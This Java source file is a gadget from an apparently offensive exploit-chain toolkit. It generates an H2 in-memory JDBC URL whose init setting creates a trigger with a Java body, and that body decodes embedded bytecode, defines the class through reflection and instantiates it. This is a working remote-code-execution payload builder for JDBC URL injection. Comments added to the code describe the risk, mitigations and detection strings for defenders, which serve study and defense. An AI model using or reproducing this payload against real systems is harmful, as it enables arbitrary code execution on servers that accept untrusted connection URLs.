package com.ar3h.chains.gadget.impl.common.jdbc.h2;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import org.apache.tomcat.util.codec.binary.Base64;

/**
 * Gadget that renders an H2 in-memory JDBC URL whose {@code init} setting carries a
 * {@code CREATE TRIGGER} statement with an inline Java source body.
 *
 * <p>What the generated URL asks H2 to do, as far as the string below shows: on connect, run
 * the {@code init} SQL, which defines a trigger named {@code loader} on
 * {@code INFORMATION_SCHEMA.TABLES}. The trigger body (between the {@code $$} delimiters) is
 * Java source that Base64-decodes an embedded blob, passes it to
 * {@code ClassLoader.defineClass} via reflection on the thread context class loader, and
 * instantiates the resulting class. The annotation description states that H2 compiles this
 * body with javac.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>Risk: the whole chain only needs a JDBC URL string to reach an H2 driver, so any code
 *       path that builds a connection URL from untrusted input (data-source config endpoints,
 *       deserialized connection-pool objects, admin "test connection" forms) is exposed when
 *       {@code org.h2.Driver} is on the classpath.</li>
 *   <li>Mitigation: never accept a full JDBC URL from untrusted input; allowlist scheme, host
 *       and database, and reject URLs carrying extra settings such as {@code init=}. Drop the
 *       H2 jar from production classpaths where it is only a test dependency.</li>
 *   <li>Detection: JDBC URLs containing {@code init=}, {@code CREATE TRIGGER}, {@code $$} or
 *       {@code defineClass} in application logs, configuration stores or request bodies are
 *       strong indicators of this technique.</li>
 * </ul>
 */
@GadgetAnnotation(name = "H2 JDBC URL Java加载任意字节码2", description = "适用于jdbc rce场景，通过H2的 TRIGGER 功能，控制javac编译器执行任意Java代码，加载字节码", dependencies = {"com.h2database:h2:org.h2.Driver"}, authors = {Authors.Unam4, Authors.Sk}, priority = 30)
@GadgetTags(tags = {Tag.H2JdbcUrl, Tag.JdbcUrlChains, Tag.END}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/h2/H2JavaJdbc2.class */
public class H2JavaJdbc2 implements Gadget {
    // Driver class published to the context by invoke(); public and non-final, so callers can
    // overwrite it before invoke() runs.
    public String driverClassName = "org.h2.Driver";

    /**
     * Builds the JDBC URL string with {@code bArr} embedded as a Base64 literal.
     *
     * <p>The URL is assembled by plain string concatenation; nothing here validates or bounds
     * {@code bArr}. Each {@code \\;} in the Java literal emits a backslash-escaped semicolon so
     * that the statement terminators inside the trigger body are not read as H2 URL setting
     * separators.
     *
     * @param bArr bytes to embed; the trigger body hands them to {@code defineClass}, so they
     *     are presumably a compiled class file (confirm against the upstream chain element)
     * @return the complete {@code jdbc:h2:mem:} URL, including the {@code init} trigger payload
     */
    public String getObject(byte[] bArr) {
        return "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER loader BEFORE SELECT ON\nINFORMATION_SCHEMA.TABLES AS $$void loader() throws java.lang.Exception{\nString tomcatStr=\"" + Base64.encodeBase64String(bArr) + "\"\\;\nbyte[] standBytes=new sun.misc.BASE64Decoder().decodeBuffer(tomcatStr)\\;\njava.lang.reflect.Method defineClassMethod=java.lang.ClassLoader.class.getDeclaredMethod(\"defineClass\",standBytes.getClass(),int.class,int.class)\\;\ndefineClassMethod.setAccessible(true)\\;\njava.lang.Class myclass=(java.lang.Class)defineClassMethod.invoke(java.lang.Thread.currentThread().getContextClassLoader(),standBytes,0,standBytes.length)\\;\nmyclass.newInstance()\\;}\n$$";
    }

    /**
     * Chain entry point: pulls the byte array from the next chain element, records the driver
     * class name in the context, and returns the rendered JDBC URL.
     *
     * @param gadgetContext shared context; receives {@code driverClassName} under
     *     {@code ContextTag.DRIVER_CLASS_NAME_KEY}
     * @param gadgetChain chain whose {@code doCreate} result is cast to {@code byte[]}
     * @return the URL string produced by {@link #getObject(byte[])}
     * @throws Exception declared by the {@code Gadget} interface; also surfaces anything thrown
     *     by {@code doCreate} or a failed cast
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        // Unchecked cast: a non-byte[] result from the upstream element fails here with
        // ClassCastException rather than inside getObject().
        byte[] bArr = (byte[]) gadgetChain.doCreate(gadgetContext);
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return getObject(bArr);
    }
}
